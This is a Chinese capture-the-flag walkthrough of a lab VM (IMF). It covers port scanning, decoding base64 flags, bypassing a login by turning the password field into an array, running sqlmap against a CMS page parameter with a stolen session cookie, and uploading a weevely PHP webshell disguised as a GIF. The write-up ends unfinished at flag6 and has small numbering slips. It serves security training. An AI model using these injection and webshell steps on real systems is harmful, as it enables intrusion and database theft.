具体过程
1.靶机的ip地址
netdiscover -i eth0 -r 网关
2.nmap扫描开放的端口
nmap -sS -Pn -A -p- -n 192.168.1.106
3.80端口(http服务)开放
4.
flag1
去contact us页面 ctrl+u查看源码
flag1{YWxsdGhlZmlsZXM=}
我们发现flag1里面是base64编码,解码查看
allthefiles
5.
flag2
还是这页的源码,这三行合在一起是flag2
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
flag2里面也是base64编码 解码得到
6.
flag3
尝试访问此目录
我们去http://192.168.1.106/contact.php
发现一些用户名
挨个尝试,发现rmichaels是可以的
将pass字段重命名为pass[]。
用户名使用rmichaels,将pass字段重命名为pass[]
更改完 Forward 获得flag3
flag3{Y29udGludWVUT2Ntcw==} 解码得
continueTOcms
7.
flag4
点击刚刚flag3页面的 链接
发现URL是有一个参数pagename
复制cookie信息然后使用sqlmap
sqlmap.py -u “http://192.168.1.106/imfadministrator/cms.php?pagename=upload” --cookie “PHPSESSID=h7bjmao2fec21vgjig4fk9m0d6” --dbs
爆破出数据库
爆破admin这个数据库
sqlmap.py -u http://… -T 数据库 -D 数据表 -C 字段 --dump
进入新页面 扫描二维码 都得flag3
flag4{dXBsb2Fkcjk0Mi5waHA=} 解码得
uploadr942.php
8.
flag5
访问新页面 发现为文件上传漏洞;
发现文件限制只能上传jpg,png,gif类型文件
尝试过很多方法都会被拦截,最终我们使用weevely来生成脚本
(weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。)
命令:weevely generate t00r ~/shell.php
修改文件头 后缀为gif
上传成功 查看源码
查看
使用weevely连接木马
命令:weevely http://192.168.1.106/imfadministrator/uploads/8699d618f9cf.gif jesse
flag5{YWdlbnRzZXJ2aWNlcw==}
解码得
agentservices
**
8.flag6需要利用逆向知识本人还不是了解!!!
参考博客:
https://blog.csdn.net/weixin_46700042/article/details/108835878